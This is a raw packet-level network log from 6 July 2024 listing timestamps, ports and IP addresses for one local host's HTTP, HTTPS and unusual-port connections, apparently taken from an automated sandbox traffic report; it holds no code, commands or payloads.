Jul 6, 2024 13:28:08.068147898 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068183899 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068188906 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068218946 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068228960 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068236113 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068259001 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068285942 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068362951 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068403959 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068454027 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068505049 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068511009 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068550110 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068577051 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068615913 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068619013 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068628073 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.068661928 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.068686962 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.069246054 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.069286108 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.069293976 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.069339991 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.069344997 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.069389105 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.129112005 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.133878946 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.133944035 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.134109974 CEST	80	49823	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.134124041 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.134165049 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.134195089 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.134244919 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.134701014 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.134748936 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.134783030 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.134826899 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.138948917 CEST	80	49823	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.138993025 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.143822908 CEST	80	49823	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.212347031 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.212413073 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.212538958 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.212588072 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.213157892 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.213217020 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.213306904 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.213356972 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.213366985 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.213404894 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.290244102 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.290303946 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.290400028 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.290446997 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.290455103 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.290493011 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.290997982 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.291044950 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.301775932 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.301826954 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.301835060 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.301875114 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.370721102 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.370784044 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.370876074 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.370923996 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.371058941 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.371105909 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.371207952 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.371251106 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.371321917 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.371365070 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.448074102 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.448127031 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.448350906 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.448405027 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.448734045 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.448785067 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.449242115 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.449282885 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.460067034 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.460119963 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.460129023 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.460161924 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.526119947 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.526171923 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.526242971 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.526289940 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.526437998 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.526477098 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.526758909 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.526809931 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.527256966 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.527287006 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.527302980 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.527312040 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.527322054 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.527344942 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606461048 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606499910 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606590986 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606590986 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606601000 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606636047 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606671095 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606678009 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606690884 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606761932 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.606790066 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.606899977 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.607490063 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.607615948 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.684709072 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.684809923 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.684818983 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.684828997 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.684931993 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.685087919 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.685245991 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.685477018 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.685484886 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.685734034 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.763022900 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.763144970 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.763510942 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.763545990 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.763597965 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.763597965 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.763611078 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.763665915 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.763734102 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.763811111 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.781116009 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.781119108 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.786150932 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:08.786164045 CEST	7707	49824	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:08.786216974 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.786267996 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.787091017 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:08.791244984 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:08.791917086 CEST	7707	49824	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:08.840396881 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.840492010 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.840588093 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:08.840776920 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:08.875502110 CEST	80	49823	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.876952887 CEST	80	49823	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.877159119 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.882327080 CEST	49823	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.987668037 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.992808104 CEST	80	49825	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:08.993063927 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.993180990 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:08.997944117 CEST	80	49825	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.000973940 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.005779982 CEST	80	49825	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.299187899 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.299236059 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.299314976 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.301944017 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.301954985 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.445327997 CEST	7707	49824	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:09.446069002 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:09.450823069 CEST	7707	49824	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:09.660439014 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:09.660507917 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:09.737946033 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:09.738006115 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:09.738022089 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:09.738050938 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:09.738070011 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:09.738100052 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:09.745656967 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:09.745672941 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:09.760289907 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.760351896 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.761960983 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.761970997 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.762177944 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.763505936 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.773951054 CEST	80	49825	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.774266958 CEST	80	49825	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.774310112 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.777561903 CEST	49825	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.804502964 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.875570059 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.875627995 CEST	443	49826	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:09.875674009 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.876372099 CEST	49826	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:09.886884928 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:09.891956091 CEST	80	49827	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:09.892033100 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:09.892272949 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:09.893981934 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.897027969 CEST	80	49827	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:09.898806095 CEST	80	49828	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.898864985 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.898941994 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.903914928 CEST	80	49828	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:09.903961897 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:09.908972025 CEST	80	49828	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.367538929 CEST	80	49827	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:10.440032005 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.625601053 CEST	80	49828	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.625763893 CEST	80	49828	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.626053095 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.629182100 CEST	49828	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.737682104 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.742667913 CEST	80	49829	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.743030071 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.743030071 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.747891903 CEST	80	49829	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.748076916 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:10.752897024 CEST	80	49829	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:10.786719084 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.789886951 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.792716026 CEST	80	49827	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:10.794294119 CEST	49827	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.795784950 CEST	80	49830	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:10.796062946 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.796139002 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:10.801809072 CEST	80	49830	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:11.296493053 CEST	80	49830	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:11.440112114 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:11.450417042 CEST	80	49829	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:11.450964928 CEST	80	49829	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:11.451066971 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.454190016 CEST	49829	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.455980062 CEST	49819	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:11.456347942 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:11.460777998 CEST	6660	49819	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:11.461100101 CEST	6660	49831	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:11.461180925 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:11.461898088 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:11.466670036 CEST	6660	49831	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:11.555397034 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:11.560868979 CEST	80	49830	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:11.560981035 CEST	49830	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:11.565696001 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:11.565741062 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:11.565905094 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:11.566071987 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:11.566091061 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:11.601769924 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.608568907 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:11.609055996 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.609117985 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.615413904 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:11.615459919 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:11.622967005 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:11.759454966 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:11.765054941 CEST	7707	49824	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:11.765103102 CEST	49824	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:12.020966053 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:12.022594929 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:12.022619963 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:12.164689064 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:12.164745092 CEST	443	49832	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:12.164786100 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:12.165154934 CEST	49832	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:12.166013002 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:12.170829058 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:12.170902967 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:12.170983076 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:12.175796032 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:13.397460938 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.397578001 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.397691965 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.397696018 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.397757053 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.398053885 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:13.398216963 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.398552895 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:13.398600101 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.398642063 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:13.398658991 CEST	6660	49831	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:13.398680925 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:13.398706913 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:13.398710966 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:13.398879051 CEST	80	49833	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.398890018 CEST	6660	49831	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:13.398915052 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.398936987 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:13.401133060 CEST	49833	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.503103971 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.509387970 CEST	80	49835	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.509479046 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.509566069 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.515924931 CEST	80	49835	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.515986919 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:13.520800114 CEST	80	49835	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:13.609859943 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:13.614725113 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:13.614773989 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:13.619570971 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:14.022191048 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:14.080833912 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:14.080914974 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:14.193306923 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:14.198189974 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:14.198246956 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:14.203021049 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:14.207711935 CEST	80	49835	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:14.209407091 CEST	80	49835	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:14.209455967 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.211452007 CEST	49835	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.315669060 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.320545912 CEST	80	49836	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:14.320626020 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.320671082 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.325500011 CEST	80	49836	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:14.325546026 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:14.331089020 CEST	80	49836	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:14.371925116 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:14.376956940 CEST	80	49834	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:14.377010107 CEST	49834	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:14.517616034 CEST	49837	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:14.524564981 CEST	80	49837	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:14.524633884 CEST	49837	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:14.524842024 CEST	49837	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:14.529526949 CEST	80	49837	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:14.996701956 CEST	80	49837	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:14.997073889 CEST	49837	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:15.002165079 CEST	80	49837	208.95.112.1	192.168.2.4
Jul 6, 2024 13:28:15.003282070 CEST	49837	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:28:15.050468922 CEST	80	49836	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.051244020 CEST	80	49836	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.051306009 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.054088116 CEST	49836	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.054338932 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.054373980 CEST	443	49838	104.26.13.205	192.168.2.4
